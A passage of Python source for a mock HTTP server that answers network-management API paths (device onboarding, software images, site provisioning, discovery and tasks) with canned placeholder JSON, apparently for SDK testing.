'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_aeb4dad04a99bbe3(self):
return re.search(
self.PNP_aeb4dad04a99bbe3_PATTERN,
self.path
)
def pnp_get_workflows_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps([{'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}])
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_bab6c9e5440885cc(self):
return re.search(
self.PNP_bab6c9e5440885cc_PATTERN,
self.path
)
def pnp_get_deviceby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_d9a1fa9c4068b23c(self):
return re.search(
self.PNP_d9a1fa9c4068b23c_PATTERN,
self.path
)
def pnp_get_device_count_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_80acb88e4ac9ac6d(self):
return re.search(
self.PNP_80acb88e4ac9ac6d_PATTERN,
self.path
)
def pnp_get_workflowby_id_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_f09319674049a7d4(self):
return re.search(
self.PNP_f09319674049a7d4_PATTERN,
self.path
)
def pnp_get_device_history_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'timestamp': 0, 'details': 'string', 'historyTaskInfo': {'name': 'string', 'type': 'string', 'timeTaken': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'startTime': 0, 'endTime': 0, 'timeTaken': 0, 'outputStr': 'string'}], 'addnDetails': [{'key': 'string', 'value': 'string'}]}, 'errorFlag': True}], 'statusCode': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_e6b3db8046c99654(self):
return re.search(
self.PNP_e6b3db8046c99654_PATTERN,
self.path
)
def pnp_get_devicelist_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_cf9418234d9ab37e(self):
return re.search(
self.PNP_cf9418234d9ab37e_PATTERN,
self.path
)
def pnp_preview_config_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'complete': True, 'config': 'string', 'error': True, 'errorMessage': 'string', 'expiredTime': 0, 'rfProfile': 'string', 'sensorProfile': 'string', 'siteId': 'string', 'startTime': 0, 'taskId': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_f3b26b5544cabab9(self):
return re.search(
self.PNP_f3b26b5544cabab9_PATTERN,
self.path
)
def pnp_add_device_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'_id': 'string', 'deviceInfo': {'source': 'string', 'serialNumber': 'string', 'stack': True, 'mode': 'string', 'state': 'string', 'location': {'siteId': 'string', 'address': 'string', 'latitude': 'string', 'longitude': 'string', 'altitude': 'string'}, 'description': 'string', 'onbState': 'string', 'authenticatedMicNumber': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'featuresSupported': ['string'], 'cmState': 'string', 'firstContact': 0, 'lastContact': 0, 'macAddress': 'string', 'pid': 'string', 'deviceSudiSerialNos': ['string'], 'lastUpdateOn': 0, 'workflowId': 'string', 'workflowName': 'string', 'projectId': 'string', 'projectName': 'string', 'deviceType': 'string', 'agentType': 'string', 'imageVersion': 'string', 'fileSystemList': [{'type': 'string', 'writeable': True, 'freespace': 0, 'name': 'string', 'readable': True, 'size': 0}], 'pnpProfileList': [{'profileName': 'string', 'discoveryCreated': True, 'createdBy': 'string', 'primaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}, 'secondaryEndpoint': {'port': 0, 'protocol': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'fqdn': 'string', 'certificate': 'string'}}], 'imageFile': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'neighborLinks': [{'localInterfaceName': 'string', 'localShortInterfaceName': 'string', 'localMacAddress': 'string', 'remoteInterfaceName': 'string', 'remoteShortInterfaceName': 'string', 'remoteMacAddress': 'string', 'remoteDeviceName': 'string', 'remotePlatform': 'string', 'remoteVersion': 'string'}], 'lastSyncTime': 0, 'ipInterfaces': [{'status': 'string', 'macAddress': 'string', 'ipv4Address': {}, 'ipv6AddressList': [{}], 'name': 'string'}], 'hostname': 'string', 'authStatus': 'string', 'stackInfo': {'supportsStackWorkflows': True, 'isFullRing': True, 'stackMemberList': [{'serialNumber': 'string', 'state': 'string', 'role': 'string', 'macAddress': 'string', 'pid': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'sudiSerialNumber': 'string', 'hardwareVersion': 'string', 'stackNumber': 0, 'softwareVersion': 'string', 'priority': 0}], 'stackRingProtocol': 'string', 'validLicenseLevels': ['string'], 'totalMemberCount': 0}, 'reloadRequested': True, 'addedOn': 0, 'siteId': 'string', 'aaaCredentials': {'password': 'string', 'username': 'string'}, 'userMicNumbers': ['string'], 'userSudiSerialNos': ['string'], 'addnMacAddrs': ['string'], 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'tags': {}, 'sudiRequired': True, 'smartAccountId': 'string', 'virtualAccountId': 'string', 'populateInventory': True, 'siteName': 'string', 'name': 'string'}, 'systemResetWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'systemWorkflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'workflow': {'_id': 'string', 'state': 'string', 'type': 'string', 'description': 'string', 'lastupdateOn': 0, 'imageId': 'string', 'currTaskIdx': 0, 'addedOn': 0, 'tasks': [{'state': 'string', 'type': 'string', 'currWorkItemIdx': 0, 'taskSeqNo': 0, 'endTime': 0, 'startTime': 0, 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'name': 'string'}], 'addToInventory': True, 'instanceType': 'string', 'endTime': 0, 'execTime': 0, 'startTime': 0, 'useState': 'string', 'configId': 'string', 'name': 'string', 'version': 0, 'tenantId': 'string'}, 'runSummaryList': [{'details': 'string', 'historyTaskInfo': {'type': 'string', 'workItemList': [{'state': 'string', 'command': 'string', 'outputStr': 'string', 'endTime': 0, 'startTime': 0, 'timeTaken': 0}], 'timeTaken': 0, 'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string'}, 'errorFlag': True, 'timestamp': 0}], 'workflowParameters': {'topOfStackSerialNumber': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'configList': [{'configParameters': [{'key': 'string', 'value': 'string'}], 'configId': 'string'}]}, 'dayZeroConfig': {'config': 'string'}, 'dayZeroConfigPreview': {}, 'version': 0, 'tenantId': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_PNP_d8a619974a8a8c48(self):
return re.search(
self.PNP_d8a619974a8a8c48_PATTERN,
self.path
)
def pnp_claim_device_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'jsonArrayResponse': [{}], 'jsonResponse': {}, 'message': 'string', 'statusCode': 0})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SWIM_0c8f7a0b49b9aedd(self):
return re.search(
self.SWIM_0c8f7a0b49b9aedd_PATTERN,
self.path
)
def swim_getsoftwareimagedetails_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': [{'applicableDevicesForImage': [{'mdfId': 'string', 'productId': ['string'], 'productName': 'string'}], 'applicationType': 'string', 'createdTime': 'string', 'extendedAttributes': {}, 'family': 'string', 'feature': 'string', 'fileServiceId': 'string', 'fileSize': 'string', 'imageIntegrityStatus': 'string', 'imageName': 'string', 'imageSeries': ['string'], 'imageSource': 'string', 'imageType': 'string', 'imageUuid': 'string', 'importSourceType': 'DEVICE', 'isTaggedGolden': True, 'md5Checksum': 'string', 'name': 'string', 'profileInfo': [{'description': 'string', 'extendedAttributes': {}, 'memory': 0, 'productType': 'string', 'profileName': 'string', 'shares': 0, 'vCpu': 0}], 'shaCheckSum': 'string', 'vendor': 'string', 'version': 'string'}], 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SWIM_8cb6783b4faba1f4(self):
return re.search(
self.SWIM_8cb6783b4faba1f4_PATTERN,
self.path
)
def swim_triggersoftwareimagedistribution_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SWIM_4dbe3bc743a891bc(self):
return re.search(
self.SWIM_4dbe3bc743a891bc_PATTERN,
self.path
)
def swim_importlocalsoftwareimage_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SWIM_fb9beb664f2aba4c(self):
return re.search(
self.SWIM_fb9beb664f2aba4c_PATTERN,
self.path
)
def swim_triggersoftwareimageactivation_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SWIM_bc8aab4746ca883d(self):
return re.search(
self.SWIM_bc8aab4746ca883d_PATTERN,
self.path
)
def swim_importsoftwareimagevia_url_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'response': {'taskId': {}, 'url': 'string'}, 'version': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITE_PROFILE_7fbe4b804879baa4(self):
return re.search(
self.SITE_PROFILE_7fbe4b804879baa4_PATTERN,
self.path
)
def site_profile_get_devicedetailsby_ip_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'provisionDetails': {'startTime': 'string', 'endTime': 'string', 'duration': 'string', 'statusMessage': 'string', 'status': 'string', 'taskNodes': [{'startTime': 'string', 'endTime': 'string', 'duration': 'string', 'status': 'string', 'nextTask': 'string', 'name': 'string', 'target': 'string', 'statusMessage': 'string', 'payload': 'string', 'provisionedNames': {}, 'errorPayload': {}, 'parentTask': {}, 'cliTemplateUserMessageDTO': {}, 'stepRan': 'string'}], 'topology': 'string', 'beginStep': 'string'}})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITE_PROFILE_828828f44f28bd0d(self):
return re.search(
self.SITE_PROFILE_828828f44f28bd0d_PATTERN,
self.path
)
def site_profile_provision_nfv_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def matches_SITE_PROFILE_2f97e8fa45f8b2a3(self):
return re.search(
self.SITE_PROFILE_2f97e8fa45f8b2a3_PATTERN,
self.path
)
def site_profile_nfv_provisioning_detail_response(self):
# Add response status code.
self.send_response(requests.codes.ok)
# Add response headers.
self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
response_content = json.dumps({'executionId': 'string', 'executionStatusUrl': 'string', 'message': 'string'})
self.wfile.write(response_content.encode('utf-8'))
return
def do_GET(self):
if self.matches_TEMPLATE_PROGRAMMER_01b09a254b9ab259():
self.template_programmer_getsthetemplatesavailable_response()
return
if self.matches_TEMPLATE_PROGRAMMER_109d1b4f4289aecd():
self.template_programmer_get_projects_response()
return
if self.matches_TEMPLATE_PROGRAMMER_c8bf6b65414a9bc7():
self.template_programmer_get_template_versions_response()
return
if self.matches_TEMPLATE_PROGRAMMER_83a3b9404cb88787():
self.template_programmer_get_template_details_response()
return
if self.matches_TEMPLATE_PROGRAMMER_9c9a785741cbb41f():
self.template_programmer_get_templatedeploymentstatus_response()
return
if self.matches_TAG_2e9db85840fbb1cf():
self.tag_get_tag_membercount_response()
return
if self.matches_TAG_4695090d403b8eaa():
self.tag_get_tagresourcetypes_response()
return
if self.matches_TAG_8091a9b84bfba53b():
self.tag_get_tag_count_response()
return
if self.matches_TAG_c1a359b14c89b573():
self.tag_get_tagby_id_response()
return
if self.matches_TAG_eab7abe048fb99ad():
self.tag_get_tagmembersby_id_response()
return
if self.matches_TAG_ee9aab01487a8896():
self.tag_get_tag_response()
return
if self.matches_NETWORK_DISCOVERY_069d9823451b892d():
self.network_discovery_getcountofalldiscoveryjobs_response()
return
if self.matches_NETWORK_DISCOVERY_33b799d04d0a8907():
self.network_discovery_get_discoveriesbyrange_response()
return
if self.matches_NETWORK_DISCOVERY_3d9b99c343398a27():
self.network_discovery_getnetworkdevicesfrom_discovery_response()
return
if self.matches_NETWORK_DISCOVERY_44974ba5435a801d():
self.network_discovery_get_snmpproperties_response()
return
if self.matches_NETWORK_DISCOVERY_63bb88b74f59aa17():
self.network_discovery_get_discoveryby_id_response()
return
if self.matches_NETWORK_DISCOVERY_99872a134d0a9fb4():
self.network_discovery_getlistofdiscoveriesbydiscovery_id_response()
return
if self.matches_NETWORK_DISCOVERY_a6965b454c9a8663():
self.network_discovery_get_devicesdiscoveredby_id_response()
return
if self.matches_NETWORK_DISCOVERY_58a3699e489b9529():
self.network_discovery_get_credentialsubtypebycredential_id_response()
return
if self.matches_NETWORK_DISCOVERY_a4967be64dfaaa1a():
self.network_discovery_get_discoveryjobsby_ip_response()
return
if self.matches_NETWORK_DISCOVERY_a6b798ab4acaa34e():
self.network_discovery_get_discovereddevicesbyrange_response()
return
if self.matches_NETWORK_DISCOVERY_ff816b8e435897eb():
self.network_discovery_get_globalcredentials_response()
return
if self.matches_NETWORK_DISCOVERY_f6ac994f451ba011():
self.network_discovery_get_discoverednetworkdevicesbydiscovery_id_response()
return
if self.matches_TASK_26b44ab04649a183():
self.task_gettaskcount_response()
return
if self.matches_TASK_a1a9387346ba92b1():
self.task_gettaskby_id_response()
return
if self.matches_TASK_e78bb8a2449b9eed():
self.task_gettasks_response()
return
if self.matches_TASK_f5a269c44f2a95fa():
self.task_gettasktree_response()
return
if self.matches_TASK_e487f8d3481b94f2():
self.task_gettaskby_operation_id_response()
return
if self.matches_COMMAND_RUNNER_33bb2b9d40199e14():
self.command_runner_getallkeywordsof_cli_saccepted_response()
return
if self.matches_FILE_3f89bbfc4f6b8b50():
self.file_getlistofavailablenamespaces_response()
return
if self.matches_FILE_42b6a86e44b8bdfc():
self.file_getlistoffiles_response()
return
